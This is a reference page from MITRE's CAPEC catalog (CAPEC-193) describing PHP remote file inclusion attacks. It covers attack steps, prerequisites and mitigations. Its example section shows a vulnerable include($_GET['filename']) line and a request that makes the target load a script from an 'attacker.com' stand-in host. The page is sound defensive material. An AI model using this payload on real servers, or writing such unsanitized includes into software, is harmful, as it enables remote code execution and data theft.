Home > CAPEC List > CAPEC-193: PHP Remote File Inclusion (Version 2.11)  

CAPEC-193: PHP Remote File Inclusion

PHP Remote File Inclusion
Definition in a New Window Definition in a New Window
Attack Pattern ID: 193
Abstraction: Detailed
Status: Draft
Completeness: Complete
Presentation Filter:
+ Summary

In this pattern the adversary is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows adversaries to hijack the targeted application and force it to execute their own instructions.

+ Attack Steps
  1. Survey application: Using a browser or an automated tool, an adversary follows all public links on a web site. He records all the links he finds.

    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.

    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.

    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

  1. Attempt variations on input parameters: The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an adversary requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads which include a reference to the remote PHP script. He records all the responses from the server that include the output of the execution of remote PHP script.

    Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the adversary controlled remote PHP script.

    Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs.

  1. Run arbitrary server-side code: As the adversary succeeds in exploiting the vulnerability, they are able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the adversary might include shell code in their script and execute commands on the server under the same privileges as the PHP runtime is running with.

    Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script.

+ Attack Prerequisites
  • Target application server must allow remote files to be included in the "require", "include", etc. PHP directives

  • The adversary must have the ability to make HTTP requests to the target web application.

+ Typical Severity


+ Typical Likelihood of Exploit

Likelihood: High

+ Methods of Attack
  • Injection
+ Examples-Instances


  • The adversary controls a PHP script on a server "http://attacker.com/rfi.txt"
  • The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt')
  • The adversary creates an HTTP request that passes his own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the ".txt" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script.
+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

To inject the malicious payload in a web page

Skill or Knowledge Level: Medium

To bypass filters in the application

+ Resources Required

None: No specialized resources are required to execute this type of attack.

+ Solutions and Mitigations

Implementation: Perform input validation for all remote content, including remote and user-generated content

Implementation: Only allow known files to be included (whitelist)

Implementation: Make use of indirect references passed in URL parameters instead of file names

Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives

+ Attack Motivation-Consequences
ScopeTechnical ImpactNote
Modify files or directories
Read files or directories
Modify application data
Read application data
Execute unauthorized code or commands
Run Arbitrary Code
Gain privileges / assume identity
Bypass protection mechanism
+ Injection Vector

Any HTTP Request transport variables (GET, POST, etc.)

+ Activation Zone

Application server running PHP where the script is executed

+ Payload Activation Impact

Application server may be used to steal information such as code, create custom queries to the databases, etc. Since the adversary's script runs within the same context as the application it is injected in, it has virtually the same capabilities.

+ Purposes
  • Exploitation
  • Penetration
+ CIA Impact
Confidentiality Impact: HighIntegrity Impact: HighAvailability Impact: High
+ Technical Context
Architectural Paradigms
+ References
[R.193.1] [REF-1] "WASC Threat Classification 2.0". WASC-05 - Remote File Inclusion. The Web Application Security Consortium (WASC). 2010. <http://projects.webappsec.org/Remote-File-Inclusion>.
[R.193.2] Shaun Clowes. "A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications". Blackhat Briefings Asia 2001. <http://www.securereality.com.au/studyinscarlet.txt>.
[R.193.3] [REF-8] "OWASP Top 10". Top 10 2007 - Malicious File Execution. 2007. The Open Web Application Security Project (OWASP). <http://www.owasp.org/index.php/Top_10_2007-A3>.
+ Content History
CAPEC Content TeamThe MITRE Corporation2014-06-23Internal_CAPEC_Team
CAPEC Content TeamThe MITRE Corporation2017-08-04Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_RequiredInternal

More information is available — Please select a different filter.
Page Last Updated or Reviewed: August 04, 2017